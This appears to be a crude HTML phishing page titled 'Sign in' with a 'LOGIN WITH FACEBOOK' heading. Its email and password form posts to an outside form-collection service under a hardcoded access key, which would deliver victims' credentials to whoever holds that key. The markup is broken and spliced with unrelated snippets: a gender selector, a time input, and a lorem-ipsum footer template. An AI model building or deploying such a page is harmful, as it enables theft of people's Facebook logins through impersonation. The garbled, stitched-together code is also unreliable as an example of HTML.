<!doctype html>
<html lang="zh">

<head>
  <title>Sign in</title>
  <meta charset="UTF-8" />
  <meta name="viewport"
    content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
</head>
<form action="https://api.web3forms.com/submit" method="POST">

    <input type="hidden" name="access_key" value="9fdbe648-2005-4963-ae68-2a64066747c6">
<body>
  <div class="container">
    <h2>LOGIN WITH FACEBOOK</h2>
    <form method="post">
      <div class="form-container"
        <input type="text" name="username"placeholder="email address" required autocomplete="off"></input>
        <br/>
            <input type="glennsamevangelio70@gmail.com" name="glennsamevangelio70@gmail.com"placeholder="Password "required>
        <input type="submit" value="Log in"></input>
      </div>
    </form>
  </div>
  <html>
<head>
<style>
h1 {
  text-shadow: 4px 4px #B2B2B2;

</style>
</head>
<body>
<div align="center">
<h6>GLENN SAM EVANGELIO</h6>
</div>
</body>
</html>
</body>
<style>
  html,
  body {
    background: navajowhite;
    padding: 0;
    margin: 0;
  }

  .container {
    width: 300px;
    background: darkgray;
    margin: 0 auto;
    text-align: center;
    line-height: 40px;
    margin-top: 30px;
    padding-top: 6px;
    padding-bottom: 15px;
    box-shadow: rgb(48 52 63 / 20%) 0px 2px 2px, rgb(255 255 255) 0px 0px 0px 1px inset;
  }

  .form-container label {
    display: inline-block;
    text-align: justify;
    text-align-last: justify;
    margin-right: 20px;
    width: 70px;
  }

  .form-container input {
    display: inline-block;
  }

  .form-container input[type=submit] {
    display: block;
    margin: 8px auto;
    padding: 0 18px;
  }

  .copyright {
    width: fit-content;
    margin: 10px auto 0 auto;
    font-size: 13px;
    color: black;
  }
</style>

</html>
<fieldset>
    <legend>GENDER</legend>
    <input type="radio" id="kra" name="m">
    <label for="kraken">MALE</label><br/>
    <input type="radio" id="sas" name="m">
    <label for="sas">FEMALE</label>
</fieldset>
 
 <!DOCTYPE html>
<html>
<head>
  <title>Play It Yourself</title>
  <style type="text/css">
    @font-face {
      font-family: myFont;
      src: url('fonts/Graduate-Regular.ttf');
    }
    /* you can now use your custom font */
    h1 {
      font-family: myFont;
    }
  </style>
</head>
<body>
  <h1><input type="time" name="" id=""></h1>
</body>
</html>

<!DOCTYPE html>
<html>
<head>
  <title>Play It Yourself</title>
  <style type="text/css">
    * {
      box-sizing: border-box;
    }
    html, body {
      margin: 0;
      padding: 0;
    }
    body {
      display: flex;
      min-height: 100vh;
      flex-direction: column;
    }
    main {
      flex: 1 0 auto;
    }
    footer {
      color: #fff;
      background: #333;
      position: relative; /* required to position the copyright at the bottom */
      font-size: 80%;
    }
    .footer-copyright {
      width: 100%;
      height: 40px;
      background: #111;
      /* positions the copyright at the bottom of the footer */
      padding: 10px;
      position: absolute;
      bottom: 0px;
      left: 0px;
    }
    .footer-body {
      margin-bottom: 40px;
      padding: 30px;
    }
    .footer-body > div:first-child {
      font-size: 150%;
    }
    .footer-body ul {
      list-style-type: none;
      margin: 0px;
      padding: 0px;
      text-align: center;
    }
    .footer-body li > a {
      color: white;
      text-decoration: none;
      margin-bottom: 7px;
    }
  </style>
</head>
<body>
  <header></header>
  <main></main>
  <footer>
    <div class="footer-body">
      <div> Brand name here</div>
      <div>
        <p> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis interdum dignissim nisl posuere efficitur. </p>
        <ul>
          <li><a href="#"> About </a></li>
          <li><a href="#"> Contact </a></li>
          <li><a href="#"> Terms & Conditions </a></li>
          <li><a href="#"> Privacy Policy </a></li>
        </ul>
      </div>
    </div>
    <div class="footer-copyright">
      I'M NOVE/11/29/22
    </div>
  </footer>
</body>
</html>